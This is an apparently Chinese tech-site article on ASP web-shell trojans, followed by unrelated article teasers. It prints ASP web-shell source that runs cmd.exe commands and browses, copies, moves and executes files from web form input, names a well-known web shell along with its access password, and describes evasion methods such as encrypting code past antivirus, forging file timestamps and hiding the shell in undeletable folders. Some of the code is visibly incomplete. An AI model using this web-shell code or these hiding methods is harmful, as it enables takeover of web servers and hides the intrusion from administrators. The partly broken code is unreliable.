asp木马核心技术是什么?常用的asp木马软件有哪些?
现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的asp木马一般有数个文件,随着asp木马的易用性、隐蔽性以及强大的可执行性,因此得到越来越的黑客和入侵者的青睐,asp木马技术也就水涨船高,现在的asp木马文件已经集成到一个文件,其大小也就二三十k,而且可以通过使用“asp木马免杀工具2.0”等软件来对asp源程序进行加密等方法,躲过防毒软件对其的查杀。下面就对目前比较流行的木马技术、木马软件以及木马防杀毒技术进行介绍。
(一)木马核心技术介绍
Asp木马中最核心的技术就是利用脚本创建对象,然后利用cmd.exe命令来执行对文件的创建、删除以及修改等操作。下面就目前较为流行的利用FSO以及不利用FSO技术的木马程序源代码进行介绍。
说明:FSO是对FileSystemObject的简称,IIS4以及后续版本中的ASP的文件操作都可以通过FileSystemObject实现,包括文本文件的读写目录操作、文件的拷贝改名删除等。FileSystemObject带来方便的同时,也具有非常大的风险性,利用FileSystemObject可以篡改并下载Fat以及FAT32分区上的任何文件,即使是ntfs,如果没有对权限进行很好的设置,同样也能遭到破坏。
1.使用FSO技术的asp木马
codepage ="936" %>
<%
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
’使用Run方法创建一个新的进程,隐藏窗口并激活另一窗口,返回由应用程序返回的任何错误代码
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ’打开临时文件szTempFile
End If
%>
<%
If (IsObject(oFile)) Then
’ -- Read the output from our command and remove the temp file -- ’
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll) ’在网页上输出命令执行的结果
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True) ’删除临时文件szTempFile
End If
%>
来调用常用的delete、copy、dir、net、netstat等一些DOS命令。
其原型为:
cmd.exe /c “dos命令” >“文件名称”
如要查看c盘所有文件并将查看结果输出到viewdrive_c.txt的命令为:
cmd.exe/cdirc:\ >viewdrive_c.txt
说明:“>”是将命令执行的结果输入到一个文件。“文件名称”中如果没有指定路径则默认保存在当前目录下。
注意:在输入的命令之间要留一个空格。
三个脚本对象,接着执行Dos命令解释器并执行所输入的Dos命令,并将输入其命令的执行结果到一个临时文件(szTempFile),然后打开临时文件并将其结果回显在网页上,最后删除临时文件。运行结果如图1所示。
2.非FSO技术的asp木马
输入要浏览的目录,最后要加\
copy
move
路径:
程序:
<%
szCMD = Request.Form("text")’目录浏览
if (szCMD <>"")then
set shell=server.createobject("shell.application") ’建立shell对象
set fod1=shell.namespace(szcmd)
set foditems=fod1.items
for each co in foditems
response.write "" & co.path & "-----" & co.size & "
"
next
end if
%>
<%
szCMD1 = Request.Form("text1")’目录拷贝,不能进行文件拷贝
szCMD2 = Request.Form("text2")
if szcmd1<>"" and szcmd2<>"" then
set shell1=server.createobject("shell.application") ’建立shell对象
set fod1=shell1.namespace(szcmd2)
for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="\" then
path=left(szcmd1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
szCMD3 = Request.Form("text3")’目录移动
szCMD4 = Request.Form("text4")
if szcmd3<>"" and szcmd4<>"" then
set shell2=server.createobject("shell.application") ’建立shell对象
set fod1=shell2.namespace(szcmd4)
for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="\" then
path=left(szcmd3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
szCMD5 = Request.Form("text5")’执行程序到指定路径
szCMD6 = Request.Form("text6")
if szcmd5<>"" and szcmd6<>"" then
set shell3=server.createobject("shell.application") ’建立shell对象
shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
response.write "command completed success!"
end if
%>
以上代码运行结果如图2所示。不使用FSO技术的ASP木马是创建一个Shell.Application对象,然后通过shell.namespace来对创建的对象进行操作。通过使用该种方法虽然不能执行net、del以及netstat等命令,但是它可以复制、移动文件及其文件夹以及执行系统中存在的特定程序。不过在每执行一次应用程序时都会打开一个进程,而且可能会报错,通过任务控制器可以查看其打开的进程。
说明:Shell.Application对象提供了NameSpace(文件夹名)、CopyHere(<源>[,选项标志])和MoveHere(<源>[,选项标志])方法。NameSpace()方法可以得到文件夹的属性,CopyHere()和MoveHere()分别对文件夹进行拷贝和移动。
(二)常用的asp木马软件
1.海阳顶端网asp木马
在众多的asp木马中,海阳顶端网asp木马应该是比较成熟的,也是用得最多的asp木马,就其版本而言,到目前为止已经推出了数个版本:海阳顶端网asp木马第一版、海阳顶端网asp木马xp版、海阳顶端网asp木马xp-net版、海阳顶端网asp木马2003版、海阳顶端asp木马安装插件版以及海阳顶端网asp木马2005版。早期的海阳顶端网asp木马一般都有数个asp文件,后期的asp木马把所有的文件都集成到一个文件中了,例如xp版和xp-net版集成后的文件大小也就二十多k。海阳顶端网asp木马是用asp脚本语言编写,提供在线更改、编辑、删除任意文件。如果服务器上存在asp木马程序,那么该服务器基本上就#¥%了。海阳顶端网asp木马xp-net版初次运行界面如图3所示,在下方的输入密码框中输入“haiyangtop.126.com”后可以使用其集成功能的界面(图4)。在该界面中可以方便的切换盘符,浏览、编辑、删除和复制指定盘符下所选中的文件。使用该木马来操作文件就如同在本机上操作文件一样方便。
2.asp木马免杀工具2.0
asp木马免杀工具2.0是一款对asp源代码进行加密的工具(图5)。大小为545k,其中asp.exe为主程序,运行程序后选择源木马文件,然后先单击“转换”,最后单击“加密”即可生成一个加密的asp木马网页文件。
3.思易ASP木马追捕2.0
、adodb.stream对象或者使用了其中的某些方法进行检查,可以对利用变量创建对象、静态对象以及自定义的关键字等进行搜索。不过该程序当对较大文件的检索可能导致IIS停止响应,甚至可能导致服务器宕机,其运行界面如图6所示。
(三)asp木马防毒技术
在攻克主机植入asp木马后,为了保护好自己的战利品,防止系统管理员发现,黑客一般情况下都会对asp木马进行保护,往往通过加密、更改时间以及使用特殊字符等手段来逃过被杀毒软件的查出和避免系统管理员的发现。下面就对其经常使用的方法进行讲解。
1.利用软件对asp源代码加密
目前有很多软件可以对asp源代码进行加密,例如asp木马免杀工具2.0等。其原理是采用一定的算法将源代码或者源代码中的关键字进行某种转换,经过转换后,源代码已经变为乱码或者显示为特定的字符形式。但是随着杀毒技术的提高和版本的升级,经过加密后的asp木马仍然不能保证躲过杀毒软件的查杀。
2.修改asp木马文件的时间
asp木马上传到服务器后,即使非常隐蔽,但是其文件修改时间的变化在正常文件中很容易被发现,因此有人通过修改木马源程序文件的时间跟在服务器上的正常文件的时间一致来逃过被管理员发现。
3.利用特殊字符"\"来保护asp木马
Windows在设计时已经考虑到不能使用“\”来作为文件及其文件夹的名字,但是在使用cmd.exe命令来创建文件时,如果其文件名中包含了“\”,则该文件名中的“\”将被忽略,但是所建立的文件夹还是会成功,只是不会显示“\”(图7)。利用"\"字符来保护asp木马文件的原理为:在IIS设置的目录下创建一个形入“a…\”的文件夹,然后将木马文件复制到该文件夹中。复制成功后,可以在浏览其中输入如下地址运行木马文件http://localhost/aspmuma/asp.../xp.asp
说明:其中我们将xp.asp木马文件复制到“asp…/”目录中,其创建命令如下:
mkdir a…\
copy xp.asp a…\
创建成功后,可以在浏览器中看到一个为“a”的文件夹,但不能打开和删除该文件夹,从而达到保护asp木马文件的目的。
网络公牛的安装步骤 网络公牛的配置
一、安装(一)解压:《网络公牛》(netbull zip)解包后会产生以下几个文件:1、buildserver exe他是用于把autobind dat,peepshell dll,peepserver exe,keycap dll捆绑成一个单独的可执行文件newserver exe2、pee
详情2018-02-15 14:51:17责编:llp 来源:驱动管家帮你识别特洛伊木马程序 特洛伊木马程序有哪些特性?
什么是特洛伊木马木马,其实质只是一个网络客户 服务程序。网络客户 服务模式的原理是一台主机提供服务 (服务器),另一台主机接受服务 (客户机)。作为服务器的主机一般会打开一个默认的端口开进行监听(Listen)
详情2018-01-04 11:19:52责编:llp 来源:驱动管家dns如何查找域名?dns是怎么如何运行的?
有一定技术基础的互联网用户都知道DNS是做什么用的,但大多数人都不清楚DNS如何查找域名。 Ven发现了一幅图片,这幅图片非常形象地描述了DNS查找下的连锁反应,对不了解DNS运行的人们可能会有些帮助。下面这张图
详情2018-02-06 09:37:16责编:llp 来源:驱动管家shellshock的危害 加速乐拦截上千次破壳漏洞攻击
2014年9月24日,Bash被曝光存在任意命令执行漏洞,漏洞编号为CVE-2014-6271,影响范围非常大:Bash
详情2018-01-24 10:19:50责编:llp 来源:驱动管家黑客软件很简单 不信就看看用delphi写的注入片段
下图只是对一个网站注入点的工具检测,当然看到了结果扫出来的密码为16位的md5加密码,但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户名和密码进行登录即可。对于黑客软件,其实并不是我们
详情2018-02-03 18:32:17责编:llp 来源:驱动管家防病毒技术 电脑怎么设置才能防止病毒捆绑常用程序?
1、百毒不侵,权限这样设我们知道病毒等恶意程序经常把自己隐藏在windows(反健设置权限)系统目录中,如果对他的权限进行下设置,能够防止绝大部分的病毒。首先,确定你的系统目录没有任何病毒;右键单击c:windows
详情2018-01-20 18:00:24责编:llp 来源:驱动管家勒索软件补丁:安装android7.0 nougat
有一天打开电脑,发现电脑已经被锁住,窗口弹出说明:如果你不给钱,就把你的电脑清空,这就是遇到了勒索软件。近年来,这种勒索已经频频出现在安卓手机上,手机里的重要资料可能比电脑里还多,这时候怎么办,真
详情2018-01-04 09:11:33责编:llp 来源:驱动管家中小型网站可以怎么拒绝服务攻击?从哪几个方面防备?
DoS(Denial of Service)是一种使用合理的效劳恳求占用过多的效劳资源,从而使合法用户无法得到效劳呼应的网络进犯行为。被DoS进犯时的表象大致有:* 被进犯主机上有很多等候的TCP衔接; * 被进犯主机的体系资
详情2018-02-01 09:35:26责编:llp 来源:驱动管家怎么入侵445 139端口?怎么保护自己的电脑关闭445 139端口?
SMB(Server Message Block),Windows协议族,用于文件和打印共享服务。在Win9X NT中SMB基于NBT实现,NBT(NetBIOS over TCP IP)使用137, 138 (UDP) and 139 (TCP)来实现基于TCP IP的NETBIOS网际互联;而
详情2018-01-19 18:57:35责编:llp 来源:驱动管家密码忘了不用怕 按照下面的步骤可以轻松破解win2000的密码
第一步,网站下载NTFSDOS Professional软件,下载后进行安装,安装后执行NTFSDOS Professional Boot Disk Wizard程序,根据向导,会提示依次插入两张软盘,其实能用到的就是第一张。第二步,用Win98软盘或光
详情2018-01-30 11:05:05责编:llp 来源:驱动管家
- .php文件被apache服务器解析成php文件的问题如何解决?
- 黑客如何踩点?黑客踩点用了哪些技术?
- 黑客基础知识 黑客实战演练
- 如何最小化你的日志?工具与数据的隐藏方法
- 【游戏攻略】《绝地求生》Mini14到底好不好用?Mini14性能分析及配件介绍
- 笔记本连接无线网络老是掉线 有什么解决方法?
- Win7系统打开游戏 提示“检测到与仿真程序有冲突” 怎么解决?
- 不想电脑中毒怎么做?用users组用户修改注册表的方法
- 苹果笔记本安装双系统后找不到驱动怎么办?千万别急着做格式化
- Ubuntu系统能不能安装显卡驱动?安装后怎么切换Nvidia双显卡驱动
- 腾讯两大《绝地求生》手游实测 正版“吃鸡”谁更好玩
- csrf漏洞现状 csrf攻击的思想
- 攻击个人主机的步骤是什么?网络攻击的原理和手法
- pstools是怎么用的?psinfo的使用教程
- 查找linux系统入侵证据的步骤,从这几方面下手
- 怎么设置默认浏览器?win8.1修改默认浏览器的方法
- 麦克风设置容易出现的问题有哪些?怎么处理
- web攻击的漏洞有哪些?如何保护web网关,阻止恶意软件?
- ubuntu系统下怎么用vsftp搭建ftp服务器?ftp服务器设置方法
- everyone权限设置:win7电脑设置everyone权限的方法